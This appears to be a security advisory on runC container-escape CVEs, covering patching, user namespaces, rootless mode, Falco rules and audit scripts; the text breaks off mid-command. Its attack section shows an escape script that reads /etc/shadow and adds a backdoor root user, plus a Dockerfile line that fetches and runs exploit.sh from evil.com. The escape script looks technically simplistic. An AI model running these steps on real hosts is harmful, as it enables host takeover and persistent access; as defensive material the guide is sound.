Critical runC Container Escape Vulnerabilities - Securing Docker and Kubernetes
Deep dive into CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881 runC vulnerabilities enabling Docker and Kubernetes container escapes. Learn immediate mitigation steps, detection strategies, and long-term hardening for production workloads.
The Container Isolation Breach
On November 5, 2025, security researchers disclosed three critical vulnerabilities in runC—the foundational container runtime powering Docker, Kubernetes, and virtually every containerized workload in production. CVE-2025-31133, CVE-2025-52565, and CVE-2025-52881 enable attackers to escape container isolation and gain root access to host systems, threatening millions of production deployments worldwide.
The threat landscape:
- Affects all Docker Engine versions prior to 27.4.0
- Impacts Kubernetes clusters across AWS EKS, Google GKE, Azure AKS
- CVSS scores ranging from 8.8 to 9.1 (Critical/High severity)
- No active exploitation detected yet, but proof-of-concept code published
- Cloud providers racing to deploy patches
This guide provides immediate mitigation steps, detection strategies, and long-term hardening guidance for production infrastructure.
What is runC and Why It Matters
runC is the OCI (Open Container Initiative) compliant container runtime that sits at the foundation of the container ecosystem. It's responsible for:
- Creating container processes from OCI bundle specifications
- Enforcing cgroups to limit CPU, memory, and I/O resources
- Implementing namespaces for process, network, and filesystem isolation
- Mounting filesystems and managing container volumes
- Applying seccomp/AppArmor profiles for syscall filtering
When runC fails to properly enforce isolation, the entire container security model collapses. An attacker who escapes a container gains:
- Root access to the host operating system
- Ability to access other containers on the same host
- Access to host secrets, credentials, and sensitive data
- Capability to pivot to other infrastructure
The Three Vulnerabilities Explained
CVE-2025-31133 (CVSS 9.0 - Critical)
Universal mount propagation vulnerability affecting ALL runC versions.
Attackers can manipulate mount propagation settings (MS_SHARED, MS_SLAVE, MS_PRIVATE) to break out of container mount namespace isolation. By setting a mount as MS_SHARED and then remounting it, changes propagate to the host filesystem.
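The propagation state of every mount is visible from inside a container: the optional-fields column of /proc/self/mountinfo carries a "shared:N" tag for MS_SHARED mounts and "master:N" for MS_SLAVE. A minimal sketch for classifying that line (classify_propagation is our illustrative helper, not runC code; a mount can carry both tags, and this sketch reports only the first match):

```shell
#!/bin/sh
# Classify the propagation of one /proc/self/mountinfo line.
# "shared:N" in the optional fields marks MS_SHARED, "master:N" marks
# MS_SLAVE; neither tag means MS_PRIVATE.
classify_propagation() {
  case " $1 " in
    *" shared:"*) echo shared ;;
    *" master:"*) echo slave ;;
    *)            echo private ;;
  esac
}

# Example: inspect the root mount of the current process (Linux only).
if [ -r /proc/self/mountinfo ]; then
  root_line=$(awk '$5 == "/"' /proc/self/mountinfo | head -n1)
  echo "/: $(classify_propagation "$root_line")"
fi
```

Inside a properly isolated container the root mount should report private (or slave); a shared root is a precondition for this escape.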
Impact: Complete container escape with root privileges on host.
CVE-2025-52565 (CVSS 8.8 - High)
Symbolic link handling vulnerability in runC 1.0.0-rc3 and later.
During container setup, runC follows symbolic links without proper validation. An attacker can create symbolic links pointing outside the container rootfs, allowing writes to arbitrary host filesystem locations.
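The defensive pattern the patch applies is to fully resolve a path before trusting it. The same idea can be sketched in shell with GNU realpath (safe_in_root is our illustrative helper, not runC's actual code):

```shell
#!/bin/sh
# safe_in_root ROOT PATH -> succeeds only if PATH, after resolving all
# symlinks, still lies inside ROOT. Uses GNU realpath (-m permits a
# not-yet-existing final component, as during container setup).
safe_in_root() {
  root=$(realpath "$1") || return 1
  target=$(realpath -m "$2") || return 1
  case "$target" in
    "$root"/*|"$root") return 0 ;;
    *)                 return 1 ;;
  esac
}
```

A symlink like rootfs/evil -> /etc makes rootfs/evil/shadow resolve to /etc/shadow, which fails the check; writing through the unresolved path is exactly the mistake the CVE describes.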
Impact: Arbitrary file write on host, leading to privilege escalation.
CVE-2025-52881 (CVSS 9.1 - Critical)
Bind mount and file descriptor manipulation affecting ALL runC versions.
Exploits race conditions in how runC handles bind mounts and file descriptors during container creation. Attackers can manipulate file descriptors to reference host filesystem locations instead of container paths.
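Conceptually, the fix is to re-resolve what an already-open descriptor points at before using it, instead of trusting the path that was checked earlier. A Linux-only shell sketch of that re-check through /proc/self/fd (illustrative, not runC's implementation):

```shell
#!/bin/sh
# Open a file, then re-resolve the descriptor's real target through
# /proc/self/fd before acting on it - the TOCTOU-resistant order of checks.
f=$(mktemp)
f=$(realpath "$f")            # normalize so the comparison below is exact
exec 3<"$f"                   # hold the file open on fd 3
actual=$(readlink /proc/self/fd/3)
if [ "$actual" = "$f" ]; then
  echo "fd 3 still points at $f"
else
  echo "fd 3 was retargeted to $actual" >&2
fi
exec 3<&-
rm -f "$f"
```

If an attacker swaps the path between the check and the use, the readlink on the descriptor exposes the real target, because the fd is bound to the inode, not to the path string.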
Impact: Direct host filesystem access, bypassing all container isolation.
Attack Vectors and Exploitation
Malicious Container Images
# Example: Dockerfile exploiting mount propagation (CVE-2025-31133)
FROM ubuntu:latest

# Install utilities needed for exploitation
RUN apt-get update && apt-get install -y \
    util-linux \
    mount \
    procps

# Create mount point for escape
RUN mkdir -p /exploit/host_escape

# Volume that will be manipulated at runtime
VOLUME /exploit

# Exploitation payload executed at container start
COPY exploit.sh /exploit.sh
RUN chmod +x /exploit.sh
CMD ["/exploit.sh"]

#!/bin/bash
# exploit.sh - Container escape payload
# Step 1: Make root mount shared (propagates to host)
mount --make-rshared /
# Step 2: Create bind mount to host root
mkdir -p /host_escape
mount --bind / /host_escape
# Step 3: Remount with write access
mount -o remount,rw /host_escape
# Step 4: Access host filesystem
ls -la /host_escape/root # Host root user's home directory
cat /host_escape/etc/shadow # Host password hashes
# Step 5: Establish persistence (create backdoor user)
echo 'backdoor:$6$salt$hashedpassword:0:0:root:/root:/bin/bash' >> /host_escape/etc/passwd
echo 'backdoor:$6$salt$hashedpassword:19000:0:99999:7:::' >> /host_escape/etc/shadow
# Step 6: Access other containers
ls /host_escape/var/lib/docker/containers/
Requirements for Exploitation
- Ability to deploy containers with custom mount options
- Access to upload/create malicious container images
- Privileges to specify volume mounts in container configuration
- No user namespace remapping (default Docker configuration)
Attackers don't need direct host access—only the ability to run containers with specific configurations.
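Because the mount-propagation vector needs containers launched with shared propagation, auditing running containers for it is a useful triage step. A sketch, assuming the docker CLI is available (has_shared_propagation is our helper; the grep pattern targets the Mounts section of docker inspect output):

```shell
#!/bin/sh
# Flag running containers whose mounts request shared propagation.
has_shared_propagation() {
  # $1 = docker inspect JSON for one container
  printf '%s\n' "$1" | grep -qE '"Propagation": *"r?shared"'
}

if command -v docker >/dev/null 2>&1; then
  for id in $(docker ps -q); do
    if has_shared_propagation "$(docker inspect "$id")"; then
      echo "shared-propagation mount in container $id"
    fi
  done
fi
```

Any container this flags deserves immediate review: shared propagation is rarely needed outside of privileged system agents.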
Real-World Impact Assessment
Affected Infrastructure
Docker Environments:
- Docker Engine < 27.4.0 (all installations)
- Docker Desktop on Windows, Mac, Linux
- Docker Swarm clusters
- Self-managed Docker hosts
Kubernetes Distributions:
- All Kubernetes versions with containerd < 1.8.1
- All Kubernetes versions with CRI-O < 1.32.1
- Managed Kubernetes: AWS EKS, Google GKE, Azure AKS, DigitalOcean DOKS
- Self-managed Kubernetes clusters
Cloud Providers:
- AWS ECS, ECS Anywhere, EKS (patched November 5, 2025)
- Google Cloud Run, GKE Standard/Autopilot (patches rolling out)
- Azure Container Instances, AKS (patches available November 8)
- DigitalOcean Kubernetes Service (patched November 8)
Estimated Impact: Over 10 million container hosts worldwide require patching.
Attack Scenarios
Scenario 1: Supply Chain Compromise
A popular Docker image on Docker Hub is compromised with malicious Dockerfile exploiting CVE-2025-31133. Developers unknowingly pull and deploy the image:
# Compromised CI/CD pipeline
docker pull malicious/php-app:latest   # Contains exploit
docker run -d -p 80:80 malicious/php-app

# Container escapes, attacker gains host root access
# Attacker accesses CI/CD secrets stored on host
# Attacker pivots to production infrastructure using stolen credentials
Scenario 2: Multi-Tenant SaaS Breach
In a multi-tenant SaaS platform where customers deploy their own containers:
# Customer-provided deployment
apiVersion: v1
kind: Pod
metadata:
  name: customer-app
spec:
  containers:
  - name: app
    image: customer-registry/app:latest  # Customer-controlled image
    volumeMounts:
    - name: data
      mountPath: /data
  volumes:
  - name: data
    emptyDir: {}
If the customer image exploits runC vulnerabilities, they escape their container and can:
- Access other tenants' data on the same node
- Steal database credentials from host environment
- Exfiltrate sensitive data from neighboring containers
Scenario 3: Insider Threat
Malicious developer with CI/CD access modifies Dockerfile:
# Legitimate application Dockerfile
FROM node:20-alpine
WORKDIR /app
COPY package*.json ./
RUN npm ci --production
COPY . .

# Malicious addition (hidden in build logs)
RUN curl -o /tmp/exploit.sh https://evil.com/exploit.sh && \
    chmod +x /tmp/exploit.sh
# Shell form so the payload runs before the app starts
CMD ["/bin/sh", "-c", "/tmp/exploit.sh && node server.js"]
Container escapes during deployment, allowing insider to:
- Plant backdoors on production hosts
- Exfiltrate customer data
- Maintain persistent access even after termination
Immediate Mitigation Steps
Priority 1: Update runC to Patched Versions
Patched versions: runC 1.2.8, 1.3.3, 1.4.0-rc.3, or later
# Check current runC version
runc --version
# Output: runc version 1.1.7 (VULNERABLE)
# Ubuntu/Debian - Update via APT
sudo apt-get update
sudo apt-get install runc

# Verify updated version
runc --version
# Output: runc version 1.2.8 (PATCHED)

# RHEL/CentOS - Update via YUM
sudo yum update runc

# Docker Engine includes runC - update Docker
sudo apt-get update
sudo apt-get install docker-ce docker-ce-cli containerd.io

# Restart Docker daemon to apply updates
sudo systemctl restart docker

# Kubernetes - Update containerd
sudo apt-get update
sudo apt-get install containerd.io=1.8.1-1
sudo systemctl restart containerd
Verification script:
#!/bin/bash
# verify-runc-patch.sh
echo "=== runC Vulnerability Check ==="

RUNC_VERSION=$(runc --version 2>/dev/null | head -n1 | awk '{print $3}')
if [ -z "$RUNC_VERSION" ]; then
    echo "✗ ERROR: runC not found"
    exit 1
fi
echo "Current runC version: $RUNC_VERSION"

# Check if version is patched
# (note: 1.4.0 release candidates before rc.3 are not caught by this regex)
if [[ "$RUNC_VERSION" =~ ^1\.(2\.[8-9]|2\.1[0-9]|3\.[3-9]|3\.[1-9][0-9]|4\.[0-9]) ]]; then
    echo "✓ runC version is PATCHED against CVE-2025-31133, CVE-2025-52565, CVE-2025-52881"
    exit 0
else
    echo "✗ runC version is VULNERABLE - UPDATE IMMEDIATELY"
    echo "Required: 1.2.8, 1.3.3, or 1.4.0-rc.3+"
    exit 1
fi
Priority 2: Enable User Namespaces (Critical Defense)
User namespaces remap container root (UID 0) to an unprivileged user on the host (e.g., UID 100000). Even if container escape succeeds, the attacker only gains access as an unprivileged user.
Docker configuration:
# Enable user namespace remapping
sudo mkdir -p /etc/docker
sudo tee /etc/docker/daemon.json > /dev/null <<EOF
{
  "userns-remap": "default",
  "default-ulimits": {
    "nofile": {
      "Name": "nofile",
      "Hard": 64000,
      "Soft": 64000
    }
  }
}
EOF

# Restart Docker daemon
sudo systemctl restart docker

# Verify user namespace is active
docker info | grep -i "userns"
# Output: Security Options: userns

# Test with a container
docker run --rm alpine id
# Output: uid=0(root) gid=0(root) <- Inside container

# Check from host perspective
docker inspect $(docker ps -lq) --format '{{.State.Pid}}'
# Container process runs as UID 100000 on host
Why this works:
Container perspective:          Host perspective:
uid=0    (root)      -->        uid=100000 (unprivileged)
uid=1000 (user)      -->        uid=101000 (unprivileged)
After container escape:
- Attacker has UID 100000 on host (NOT root)
- Cannot modify /etc/shadow, /etc/passwd
- Cannot access other users' files
- Cannot install backdoors
- Severely limited damage potential
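Whether remapping is actually in effect can be read straight from the kernel: /proc/<pid>/uid_map lists "<inside-uid> <outside-uid> <count>" for each mapped range. A small helper for interpreting that first line (uid_map_is_remapped is our illustrative name):

```shell
#!/bin/sh
# uid_map_is_remapped LINE -> succeeds when container UID 0 maps to a
# non-zero host UID. The host-root identity map reads "0 0 4294967295".
uid_map_is_remapped() {
  set -- $1   # intentional word splitting of the uid_map fields
  [ "$1" = 0 ] && [ "$2" != 0 ]
}

# Example: check the current process (remapped only inside a user namespace).
if uid_map_is_remapped "$(head -n1 /proc/self/uid_map 2>/dev/null)"; then
  echo "running in a remapped user namespace"
else
  echo "identity mapping (no user namespace)"
fi
```

Run against a container's PID from the host, a first field of 0 with a large second field (e.g. 100000) confirms the remap is live.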
Kubernetes user namespace support (alpha in 1.28+):
# Requires the UserNamespacesSupport feature gate
apiVersion: v1
kind: Pod
metadata:
  name: secure-app
spec:
  hostUsers: false  # Enable user namespace for this pod
  securityContext:
    runAsNonRoot: true
    runAsUser: 10000
    fsGroup: 10000
  containers:
  - name: app
    image: myapp:latest
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
        drop: ["ALL"]
Priority 3: Run Rootless Containers
Rootless mode runs the entire Docker daemon as an unprivileged user, not just containers.
# Install rootless Docker (no sudo required)
curl -fsSL https://get.docker.com/rootless | sh
# Configure PATH
export PATH=$HOME/bin:$PATH
export DOCKER_HOST=unix:///run/user/$(id -u)/docker.sock

# Enable at system startup
systemctl --user enable docker
sudo loginctl enable-linger $(whoami)

# Start rootless Docker daemon
systemctl --user start docker

# Verify rootless mode
docker context ls
# Output: rootless * unix:///run/user/1000/docker.sock

# Test with a container
docker run --rm alpine id
# Output: uid=0(root) - root inside the container's user namespace,
# mapped to your unprivileged UID on the host

# Verify from host (the daemon itself is not running as root)
ps aux | grep dockerd
# user  12345  dockerd --rootless (NOT root!)
Rootless limitations:
- No support for cgroup v1 (requires cgroup v2)
- Port binding < 1024 requires sysctl changes
- Some volume types unsupported (NFS, CIFS)
- Slightly higher performance overhead
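The port-binding limitation has a one-line fix: lower the kernel's unprivileged-port floor. This is host configuration applied as root; the value 80 below is an assumption for a web workload:

```shell
# Let unprivileged processes (including rootless Docker) bind ports >= 80.
echo 'net.ipv4.ip_unprivileged_port_start=80' | \
  sudo tee /etc/sysctl.d/99-rootless-ports.conf
sudo sysctl --system   # reload sysctl configuration
```

Alternatively, keep the floor at 1024 and publish the container on a high port behind a load balancer.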
When to use rootless:
- Development environments (mandatory)
- CI/CD build agents (highly recommended)
- Production non-critical workloads (recommended)
- Multi-tenant platforms where users run untrusted code (mandatory)
Priority 4: Kubernetes Pod Security Standards
Enforce restricted security policies to limit attack surface:
# Namespace-level enforcement
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    # Enforce restricted policy (blocks privileged pods)
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/audit: restricted
    pod-security.kubernetes.io/warn: restricted
---
# Pod with restricted security context
apiVersion: v1
kind: Pod
metadata:
  name: secure-app
  namespace: production
spec:
  # Pod-level security context
  securityContext:
    runAsNonRoot: true
    runAsUser: 10000
    fsGroup: 10000
    seccompProfile:
      type: RuntimeDefault
    supplementalGroups: [10000]
  containers:
  - name: app
    image: myapp:latest
    # Container-level security context
    securityContext:
      # Prevent privilege escalation exploits
      allowPrivilegeEscalation: false
      # Read-only root filesystem (prevent malware persistence)
      readOnlyRootFilesystem: true
      # Drop ALL capabilities, add only what's needed
      capabilities:
        drop: ["ALL"]
        add: ["NET_BIND_SERVICE"]  # Only if binding to port <1024
      # Run as non-root user
      runAsNonRoot: true
      runAsUser: 10000
      runAsGroup: 10000
    # Only allow tmpfs for writable directories
    volumeMounts:
    - name: tmp
      mountPath: /tmp
    - name: cache
      mountPath: /app/cache
  volumes:
  - name: tmp
    emptyDir:
      medium: Memory
      sizeLimit: 128Mi
  - name: cache
    emptyDir:
      sizeLimit: 512Mi
Enforcement via admission controller:
# PodSecurity admission plugin configuration
apiVersion: apiserver.config.k8s.io/v1
kind: AdmissionConfiguration
plugins:
- name: PodSecurity
  configuration:
    apiVersion: pod-security.admission.config.k8s.io/v1
    kind: PodSecurityConfiguration
    defaults:
      enforce: "restricted"
      enforce-version: "latest"
      audit: "restricted"
      audit-version: "latest"
      warn: "restricted"
      warn-version: "latest"
    exemptions:
      usernames: []
      runtimeClasses: []
      namespaces: [kube-system]  # System pods only
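Namespaces created before the labels were rolled out are easy to miss. A quick audit for namespaces not yet enforcing the restricted level can be sketched as follows (assumes kubectl access; audit_line is our illustrative helper):

```shell
#!/bin/sh
# Print the names of namespaces whose enforce label is not "restricted".
audit_line() {
  # $1 = "<namespace> <enforce-label-or-empty>"
  ns=${1%% *}
  level=${1#* }
  [ "$level" = restricted ] || echo "$ns"
}

if command -v kubectl >/dev/null 2>&1; then
  kubectl get ns -o jsonpath='{range .items[*]}{.metadata.name} {.metadata.labels.pod-security\.kubernetes\.io/enforce}{"\n"}{end}' \
    | while read -r line; do audit_line "$line"; done
fi
```

Dots in the label key must be escaped in kubectl's jsonpath, as shown; a namespace with no label at all is also reported.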
Detection and Monitoring
Falco Rules for Container Escape Detection
Deploy Falco with custom rules to detect exploitation attempts:
# /etc/falco/falco_rules.local.yaml
- rule: Detect Mount Propagation Manipulation (CVE-2025-31133)
  desc: Detects attempts to manipulate mount propagation for container escape
  condition: >
    spawned_process and
    container and
    proc.name in (mount, umount, umount2) and
    (proc.cmdline contains "make-rshared" or
     proc.cmdline contains "make-rslave" or
     proc.cmdline contains "make-rprivate" or
     proc.cmdline contains "make-shared")
  output: >
    CRITICAL: Possible container escape via mount manipulation detected
    (user=%user.name container=%container.name image=%container.image.repository
    command=%proc.cmdline pid=%proc.pid)
  priority: CRITICAL
  tags: [container_escape, cve-2025-31133, mitre_privilege_escalation]

- rule: Detect Symbolic Link Manipulation (CVE-2025-52565)
  desc: Detects suspicious symlink operations exploiting runC vulnerability
  condition: >
    spawned_process and
    container and
    proc.name = ln and
    (proc.cmdline contains "../" or
     proc.cmdline contains "/host" or
     proc.cmdline contains "/proc/self/root")
  output: >
    HIGH: Suspicious symbolic link manipulation in container
    (user=%user.name container=%container.name command=%proc.cmdline)
  priority: HIGH
  tags: [container_escape, cve-2025-52565]

- rule: Detect Host Filesystem Access from Container
  desc: Detects attempts to access host filesystem from container
  condition: >
    open_read and
    container and
    (fd.name startswith /host/ or
     fd.name startswith /proc/1/root/ or
     fd.name = /etc/shadow or
     fd.name = /etc/passwd)
  output: >
    CRITICAL: Container attempting to access host filesystem
    (user=%user.name container=%container.name file=%fd.name)
  priority: CRITICAL
  tags: [container_escape, cve-2025-52881]

- rule: Detect Container Creating Backdoor User
  desc: Detects attempts to modify host user database from container
  condition: >
    open_write and
    container and
    (fd.name in (/etc/passwd, /etc/shadow, /etc/group) or
     fd.name startswith /host/etc/)
  output: >
    CRITICAL: Container attempting to modify host user database
    (user=%user.name container=%container.name file=%fd.name)
  priority: CRITICAL
  tags: [persistence, backdoor]
Deploy Falco on Kubernetes:
# Install Falco via Helm
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update
helm install falco falcosecurity/falco \
  --namespace falco --create-namespace \
  --set falco.rulesFile[0]=/etc/falco/falco_rules.yaml \
  --set falco.rulesFile[1]=/etc/falco/falco_rules.local.yaml \
  --set falco.grpc.enabled=true \
  --set falco.grpcOutput.enabled=true

# Apply custom rules
kubectl create configmap falco-rules \
  --from-file=falco_rules.local.yaml \
  -n falco
Runtime Monitoring with eBPF
# Install BCC tools for container monitoring
sudo apt-get install bpfcc-tools linux-headers-$(uname -r)

# Monitor all mount syscalls
sudo mountsnoop-bpfcc | \
  grep -E "make-rshared|make-shared|MS_SHARED"

# Monitor file opens
sudo opensnoop-bpfcc | \
  grep -E "/etc/shadow|/etc/passwd|/host/"

# Monitor process execution in containers
sudo execsnoop-bpfcc | grep -E "docker|containerd"

# Trace bind mount operations
sudo bpftrace -e '
tracepoint:syscalls:sys_enter_mount
/comm == "runc"/
{
  printf("%s mounting %s\n", comm, str(args->dev_name));
}
'
Long-Term Security Hardening
1. Implement Least Privilege Container Images
# Multi-stage build with minimal attack surface
FROM golang:1.21-alpine AS builder
WORKDIR /build
# Build with security flags
COPY go.mod go.sum ./
RUN go mod download && go mod verify
COPY . .
RUN CGO_ENABLED=0 GOOS=linux GOARCH=amd64 \
    go build -ldflags="-s -w -extldflags '-static'" \
    -trimpath -o /app/server .

# Distroless runtime (no shell, no package manager)
FROM gcr.io/distroless/static-debian12:nonroot

# Copy only the binary (no build tools)
COPY --from=builder /app/server /server

# Run as non-root user (UID 65532)
USER nonroot:nonroot

# No shell to exploit!
ENTRYPOINT ["/server"]
2. Image Scanning in CI/CD Pipeline
# .github/workflows/container-security.yml
name: Container Security Scan

on:
  push:
    branches: [main, develop]
  pull_request:
    branches: [main]

jobs:
  security-scan:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v4

    - name: Build container image
      run: docker build -t myapp:${{ github.sha }} .

    - name: Run Trivy vulnerability scanner
      uses: aquasecurity/trivy-action@master
      with:
        image-ref: myapp:${{ github.sha }}
        format: 'sarif'
        output: 'trivy-results.sarif'
        severity: 'CRITICAL,HIGH'
        exit-code: '1'  # Fail on vulnerabilities

    - name: Check for runC vulnerabilities specifically
      run: |
        # Mount the Docker socket so Trivy can see the local image,
        # and the workspace so the report lands on the runner
        docker run --rm \
          -v /var/run/docker.sock:/var/run/docker.sock \
          -v $(pwd):/work -w /work \
          aquasec/trivy image \
          --severity CRITICAL,HIGH \
          --vuln-type os,library \
          --format json \
          --output scan-results.json \
          myapp:${{ github.sha }}
        # Fail if runC CVEs detected
        if grep -E "CVE-2025-(31133|52565|52881)" scan-results.json; then
          echo "ERROR: runC vulnerabilities detected!"
          exit 1
        fi

    - name: Upload Trivy results to GitHub Security
      uses: github/codeql-action/upload-sarif@v2
      with:
        sarif_file: 'trivy-results.sarif'

    - name: Scan Dockerfile for misconfigurations
      run: |
        docker run --rm -v $(pwd):/project \
          hadolint/hadolint hadolint /project/Dockerfile
3. Network Segmentation and Policies
# Kubernetes NetworkPolicy - Deny lateral movement
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: deny-container-escape-traffic
  namespace: production
spec:
  podSelector: {}  # Apply to all pods in namespace
  policyTypes:
  - Egress
  - Ingress
  # Ingress: only same-namespace traffic on the app port is allowed
  ingress:
  - from:
    - podSelector: {}  # Only from same namespace
    ports:
    - protocol: TCP
      port: 8080
  # Restricted egress
  egress:
  # Allow DNS (kube-dns pods in kube-system)
  - to:
    - namespaceSelector:
        matchLabels:
          name: kube-system
      podSelector:
        matchLabels:
          k8s-app: kube-dns
    ports:
    - protocol: UDP
      port: 53
  # Allow application traffic
  - to:
    - podSelector: {}
    ports:
    - protocol: TCP
      port: 8080
  # Allow other egress, but block metadata services and private ranges
  # (prevents credential theft after an escape)
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32  # AWS, GCP, and Azure metadata service
        - 169.254.170.2/32    # AWS ECS task metadata
        - 100.100.100.200/32  # Alibaba Cloud metadata
        - 10.0.0.0/8          # Private networks
        - 172.16.0.0/12
        - 192.168.0.0/16
4. Runtime Security with gVisor
gVisor provides an additional isolation layer by implementing a userspace kernel:
# Install gVisor runtime
curl -fsSL https://gvisor.dev/archive.key | sudo apt-key add -
sudo add-apt-repository "deb https://storage.googleapis.com/gvisor/releases release main"
sudo apt-get update
sudo apt-get install runsc
# Configure Docker to use gVisor (the apt package installs /usr/bin/runsc)
sudo tee /etc/docker/daemon.json > /dev/null <<EOF
{
  "runtimes": {
    "runsc": {
      "path": "/usr/bin/runsc"
    }
  }
}
EOF
sudo systemctl restart docker

# Run container with gVisor
docker run --runtime=runsc --rm alpine uname -a
# Reports a 4.4.0 kernel (gVisor's userspace kernel, not the host kernel)
gVisor on Kubernetes:
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc
---
apiVersion: v1
kind: Pod
metadata:
  name: secure-app
spec:
  runtimeClassName: gvisor  # Use gVisor instead of runc
  containers:
  - name: app
    image: myapp:latest
Note: gVisor adds ~20-30% performance overhead but provides defense-in-depth against kernel exploits and container escapes.
Verification and Compliance
Automated Security Verification Script
#!/bin/bash
# security-verification.sh - Comprehensive runC security check
# (no "set -e": the ((...)) counters and probe commands may legitimately fail)

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

echo "========================================"
echo "runC Container Escape Security Audit"
echo "========================================"
echo ""

PASS=0
WARN=0
FAIL=0

# Check 1: runC version
echo -n "[1/10] Checking runC version... "
RUNC_VERSION=$(runc --version 2>/dev/null | head -n1 | awk '{print $3}')
if [[ "$RUNC_VERSION" =~ ^1\.(2\.[8-9]|2\.1[0-9]|3\.[3-9]|3\.[1-9][0-9]|4\.[0-9]) ]]; then
    echo -e "${GREEN}PASS${NC} (v$RUNC_VERSION)"
    ((PASS++))
else
    echo -e "${RED}FAIL${NC} (v$RUNC_VERSION is vulnerable)"
    ((FAIL++))
fi

# Check 2: Docker version
echo -n "[2/10] Checking Docker version... "
DOCKER_VERSION=$(docker version --format '{{.Server.Version}}' 2>/dev/null)
if [[ "$DOCKER_VERSION" =~ ^27\.([4-9]|[1-9][0-9]) ]] || [[ "$DOCKER_VERSION" =~ ^2[8-9]\. ]]; then
    echo -e "${GREEN}PASS${NC} (v$DOCKER_VERSION)"
    ((PASS++))
else
    echo -e "${YELLOW}WARN${NC} (v$DOCKER_VERSION may be vulnerable)"
    ((WARN++))
fi

# Check 3: User namespace enabled
echo -n "[3/10] Checking user namespace remapping... "
if docker info 2>/dev/null | grep -q "userns"; then
    echo -e "${GREEN}PASS${NC} (enabled)"
    ((PASS++))
else
    echo -e "${YELLOW}WARN${NC} (not enabled - RECOMMENDED for defense-in-depth)"
    ((WARN++))
fi

# Check 4: Rootless mode available
echo -n "[4/10] Checking rootless container support... "
if docker context ls 2>/dev/null | grep -q "rootless"; then
    echo -e "${GREEN}PASS${NC} (available)"
    ((PASS++))
else
    echo -e "${YELLOW}WARN${NC} (not configured)"
    ((WARN++))
fi

# Check 5: Kubernetes Pod Security Standards
echo -n "[5/10] Checking Kubernetes pod security... "
if command -v kubectl &> /dev/null; then
    if kubectl get namespace production &>/dev/null; then
        ENFORCE=$(kubectl get namespace production -o jsonpath='{.metadata.labels.pod-security\.kubernetes\.io/enforce}' 2>/dev/null)
        if [ "$ENFORCE" = "restricted" ]; then
            echo -e "${GREEN}PASS${NC} (restricted policy enforced)"
            ((PASS++))
        else
            echo -e "${YELLOW}WARN${NC} (restricted policy not enforced)"
            ((WARN++))
        fi
    else
        echo -e "${YELLOW}SKIP${NC} (production namespace not found)"
    fi
else
    echo -e "${YELLOW}SKIP${NC} (kubectl not installed)"
fi

# Check 6: Falco runtime detection
echo -n "[6/10] Checking Falco container escape detection... "
if systemctl is-active --quiet falco 2>/dev/null; then
    if grep -qE "cve-2025-31133|container_escape" /etc/falco/falco_rules.local.yaml 2>/dev/null; then
        echo -e "${GREEN}PASS${NC} (rules configured)"
        ((PASS++))
    else
        echo -e "${YELLOW}WARN${NC} (custom rules not found)"
        ((WARN++))
    fi
else
    echo -e "${YELLOW}WARN${NC} (Falco not running)"
    ((WARN++))
fi

# Check 7: Seccomp profile
echo -n "[7/10] Checking seccomp profiles... "
if docker info 2>/dev/null | grep -qi "seccomp"; then
    echo -e "${GREEN}PASS${NC} (seccomp enabled)"
    ((PASS++))
else
    echo -e "${RED}FAIL${NC} (seccomp not enabled)"
    ((FAIL++))
fi

# Check 8: AppArmor or SELinux
echo -n "[8/10] Checking mandatory access control... "
if command -v aa-status &> /dev/null && aa-status --enabled 2>/dev/null; then
    echo -e "${GREEN}PASS${NC} (AppArmor enabled)"
    ((PASS++))
elif command -v getenforce &> /dev/null && [ "$(getenforce 2>/dev/null)" = "Enforcing" ]; then
    echo -e "${GREEN}PASS${NC} (SELinux enforcing)"
    ((PASS++))
else
    echo -e "${YELLOW}WARN${NC} (no MAC system enabled)"
    ((WARN++))
fi

# Check 9: Container image scanning
echo -n "[9/10] Checking container image scanning... "
if command -v trivy &> /dev/null; then
    echo -e "${GREEN}PASS${NC} (Trivy installed)"
    ((PASS++))
else
    echo -e "${YELLOW}WARN${NC} (no image scanner found)"
    ((WARN++))
fi

# Check 10: Network policies (Kubernetes)
echo -n "[10/10] Checking network policies... "
if command -v kubectl &> /dev/null; then
    NETPOL_COUNT=$(kubectl get networkpolicies --all-namespaces --no-headers 2>/dev/null | wc -l)
    if [ "$NETPOL_COUNT" -gt 0 ]; then
        echo -e "${GREEN}PASS${NC} ($NETPOL_COUNT policies found)"
        ((PASS++))
    else
        echo -e "${YELLOW}WARN${NC} (no network policies configured)"
        ((WARN++))
    fi
else
    echo -e "${YELLOW}SKIP${NC} (kubectl not installed)"
fi

echo ""
echo "========================================"
echo "Summary:"
echo -e "  ${GREEN}PASS${NC}: $PASS"
echo -e "  ${YELLOW}WARN${NC}: $WARN"
echo -e "  ${RED}FAIL${NC}: $FAIL"
echo "========================================"

if [ $FAIL -gt 0 ]; then
    echo -e "${RED}CRITICAL ISSUES DETECTED - IMMEDIATE ACTION REQUIRED${NC}"
    exit 1
elif [ $WARN -gt 3 ]; then
    echo -e "${YELLOW}MULTIPLE WARNINGS - REVIEW RECOMMENDED${NC}"
    exit 0
else
    echo -e "${GREEN}SECURITY POSTURE: ACCEPTABLE${NC}"
    exit 0
fi
Cloud Provider Update Status
AWS
ECS/ECS Anywhere:
- ✅ Patched: November 5, 2025
- Action: No manual action required
EKS:
- ✅ AMI updates available: November 7, 2025
- Action: Update node groups to latest EKS-optimized AMI
# Check EKS node AMI version
kubectl get nodes -o json | jq -r '.items[] | {name: .metadata.name, image: .status.nodeInfo.osImage}'

# Update node group (Terraform example)
resource "aws_eks_node_group" "main" {
  ami_type        = "AL2_x86_64"        # Latest AL2 AMI includes patch
  release_version = "1.30.6-20251107"   # Patched version
}
Google Cloud
GKE Standard:
- ⏳ Patches rolling out: November 6-10, 2025
- Action: Verify auto-upgrade enabled
GKE Autopilot:
- ✅ Automatically patched: November 6, 2025
# Check GKE cluster version
gcloud container clusters describe CLUSTER_NAME \
  --format="value(currentNodeVersion)"

# Enable auto-upgrade (if disabled)
gcloud container node-pools update POOL_NAME \
